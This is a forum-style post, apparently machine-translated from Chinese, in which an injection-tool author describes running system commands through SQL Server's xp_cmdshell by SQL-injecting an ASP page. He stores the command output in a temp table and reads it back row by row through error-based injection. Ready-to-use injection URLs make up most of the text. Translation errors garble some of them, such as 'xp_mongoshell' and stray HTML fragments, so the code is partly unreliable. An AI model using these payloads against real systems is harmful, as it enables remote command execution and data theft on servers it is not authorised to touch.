My experience of executing xp_mongoshell echo reading!

Recently I am writing xp_mongoshell to execute commands. How can I read Echo!

Run the following command in "Enterprise Manager SQL Server Enterprise Manager ":
EXEC master. dbo. xp_mongoshell dir c:
Screen. width-300) this. width = screen. width-300 "border = 0>
The content can be displayed, but how can I display it? I used to think that I did not read one row at a time. This is what I wrote!

// Create a temporary table first
Http://www.xxx.com/aa.asp? = 1; create TABLE D99_CMD ([output] [varchar] (1000 ));--

// Input the content that xp_cmdshell wants to display to a temporary table.
Http://www.xxx.com/aa.asp? = 1; insert D99_CMD exec master. dbo. xp_mongoshell dir c:

// Read content
Http://www.xxx.com/aa.asp? = 1 And (select Top 1 char (124) % 2 Boutput % 2 Bchar (124) From (select Top 1 output From D99_CMD Order by [output]) T Order by [output] desc)> 0

Only when I read the content can I know that it cannot be read! I checked the temporary table, and the content is there!
Think about it later, it should be because the column creation information is insufficient (empty rows), and the content cannot pop up! Even if it can be cracked, it may not be in order!

How can I read a row!

Haha! So I used a stupid method. How can I check whether xp_mongoshell software is available on the Internet to capture packets!

Screen. width-300) this. width = screen. width-300 "border = 0>
This software has implemented this function very early, so I took him to capture packets!

; Exec aster .. XP_CMDSHELL Dir C:> C: NB_Commander_Txt.log; drop TABLE NB_Commander_Tmp; create TABLE NB_Commander_Tmp (ResultTxt varchar (7996) NULL); BULK insert [sdyy] .. [NB_Commander_Tmp] from c: NB_Commander_Txt.log WITH (KEEPNULLS); alter Table NB_Commander_Tmp add ID int not null identity (1, 1 )--

He writes the executed echo content into a file and then imports it into the database. He is dizzy, and many SQL commands are known by his predecessors!
I see Code dizzy, a lot! (Don't laugh at me. In fact, I didn't know SQL at all before I made the injection tool! Only after write injection can we know some SQL commands for injection)

Read the code of the predecessors and see
ID int not null identity (1, 1)
Automatic ID !!!!

Can I add a unique ID number when executing xp_cmdshell !!!!
I added an automatic programming ID to the temporary table. Then, I run the xp_mongoshell command to import the echo content to the database. After executing the command, I checked the temporary table!

I'm glad to know that you can import the content! Succeeded. succeeded !!! (I didn't know how to add this! Not familiar with SQL, don't laugh at me) with an ID that can be sorted, the burst content is not complicated!

I changed the code!
========================================================== ======================================
Create a table, add an automatic ID, and import the echo content of xp_mongoshell into the temporary table.
Http://www.xxx.com/aa.asp? = 1; drop TABLE D99_CMD; create TABLE D99_CMD ([Data] [varchar] (1000), ID int not null identity (); insert D99_CMD exec master. dbo. xp_cmdshell dir c :;--

// After that, the content will pop up. You can pop up one line at a time!
Http://www.xxx.com/aa.asp? = 1 And (select Top 1 char (124) % 2 Bdata % 2 Bchar (124) From (select Top 1 [ID], [Data] From D99_CMD Order by [ID]) T Order by [ID] desc)> 0
========================================================== ======================================

Drop TABLE D99_CMD
Yes to clear previous content

If you want to know the number of rows, you can read
Http://www.xxx.com/aa.asp? = 1 And (select char (124) % 2 Bcast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_CMD)> 0

The echo content is as follows:
Bytes ----------------------------------------------------------------------------------------------------
Microsoft ole db Provider for ODBC Drivers error 80040e07

[Microsoft] [odbc SQL Server Driver] [SQL Server] A syntax error occurs when a varchar value | 37 | is converted to an int column.

| 37 | the 37 in is the number of rows.


========================================================
Because I am not familiar with SQL commands, I have taken many detours!
This is also my experience in executing echo with xp_cmdshell!


Ah d
QQ: 9269563
Http://www.d99net.com
Http://d99.126.com